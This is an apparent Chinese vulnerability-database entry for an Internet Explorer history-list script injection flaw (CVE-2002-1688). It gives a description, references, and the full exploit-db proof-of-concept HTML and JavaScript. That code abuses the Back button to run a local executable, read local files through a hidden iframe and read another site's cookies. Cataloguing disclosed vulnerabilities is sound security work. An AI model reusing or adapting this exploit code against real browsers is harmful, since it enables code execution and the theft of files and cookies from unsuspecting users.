Microsoft Internet Explorer历史列表脚本插入漏洞

Microsoft Internet Explorer历史列表脚本插入漏洞

漏洞ID 1106677 漏洞类型 设计错误
发布时间 2002-04-15 更新时间 2005-10-20
图片[1]-Microsoft Internet Explorer历史列表脚本插入漏洞-安全小百科CVE编号 CVE-2002-1688
图片[2]-Microsoft Internet Explorer历史列表脚本插入漏洞-安全小百科CNNVD-ID CNNVD-200212-760
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/21376
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-760
|漏洞详情
MicrosoftInternetExplorer是一款由Microsoft开发维护的流行的WEB浏览器。MicrosoftInternetExplorer在处理历史列表中存在漏洞,可导致远程攻击者插入任意脚本代码到历史列表中并执行。MicrosoftInternetExplorer在浏览器历史列表中使用javascript:URL方式存储,而包含在javascript:URL中的脚本代码会以最后查看页面的安全区域上下文来执行,此功能可以保护针对包含在恶意构建WEB页中javascript:URL的攻击。但是攻击者可以设置成到用户点击’后退’键时触发javascript:URL,这可以导致包含在javascript:URL中的脚本代码在其他页面中的上下文内容中执行。当按’后退’键页面装载失败时,一般行为是会显示由IE在本地安全区域中操作的错误页面(在w2k中是res://C:WINNTSystem32shdoclc.dll/dnserror.htm#),因此javascript:URL中的脚本代码可以在本地安全区域上下文中执行,或者读取任意本地文件内容。
|漏洞EXP
source: http://www.securityfocus.com/bid/4505/info

A vulnerability has been reported in some versions of Internet Explorer. It is possible to inject JavaScript code into the browser history list, and execute it within any page context given appropriate user interaction.

Internet Explorer stores javascript: URLs in the browser history list. Script executed within the javascript: URL will inherit the security zone of the last viewed page. This provides protection against javascript: URLs included within a maliciously constructed web page. However, a user may navigate to a javascript: URL using the 'Back' button in their browser. This may result in the injected script code executing within the context of another page.

This behavior has been reported in versions 6.0 and 5.5 of IE. Other versions of Internet Explorer may share this vulnerability. This has not, however, been confirmed. 

<html>
<h1>Press link and then the backbutton to trigger script.</h1>
<a href="javascript:execFile('file:///c:/winnt/system32/winmine.exe')">
Run Minesweeper (c:/winnt/system32/winmine.exe Win2000 pro)</a><br>
<a href="javascript:execFile('file:///c:/windows/system32/winmine.exe')">
Run Minesweeper (c:/windows/system32/winmine.exe XP, ME etc...)</a><br>
<a href="javascript:readFile('file:///c:/test.txt')">
Read c:test.txt (needs to be created)</a><br>
<a href="javascript:readCookie('http://www.google.com/')">
Read Google cookie</a>

<script>
// badUrl = "http://www.nonexistingdomain.se"; // Use if not XP
badUrl = "res:";
function execFile(file){
  s = '<object classid=CLSID:11111111-1111-1111-1111-111111111111 ';
  s+= 'CODEBASE='+file+'></OBJECT>';
  backBug(badUrl,s);
}
function readFile(file){
  s = '<iframe name=i src='+file+' style=display:none onload=';
  s+= 'alert(i.document.body.innerText)></iframe>';
  backBug(badUrl,s);
}
function readCookie(url){
  s = '<script>alert(document.cookie);close();<"+"/script>';
  backBug(url,s);
}
function backBug(url,payload){
  len = history.length;
  page = document.location;
  s = "javascript:if (history.length!="+len+") {";
  s+= "open('javascript:document.write(""+payload+"")')";
  s+= ";history.back();} else '<script>location=""+url
  s+= "";document.title=""+page+"";<"+"/script>';";
  location = s;
}
</script>
</html>
|参考资料

来源:XF
名称:ie-history-javascript-urls(8844)
链接:http://xforce.iss.net/xforce/xfdb/8844
来源:BID
名称:4505
链接:http://www.securityfocus.com/bid/4505
来源:NSFOCUS
名称:2606
链接:http://www.nsfocus.net/vulndb/2606

相关推荐: PHPSlash Arbitrary Account Privilege Escalation Vulnerability

PHPSlash Arbitrary Account Privilege Escalation Vulnerability 漏洞ID 1096362 漏洞类型 Design Error 发布时间 2005-07-07 更新时间 2005-07-07 CVE编号…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享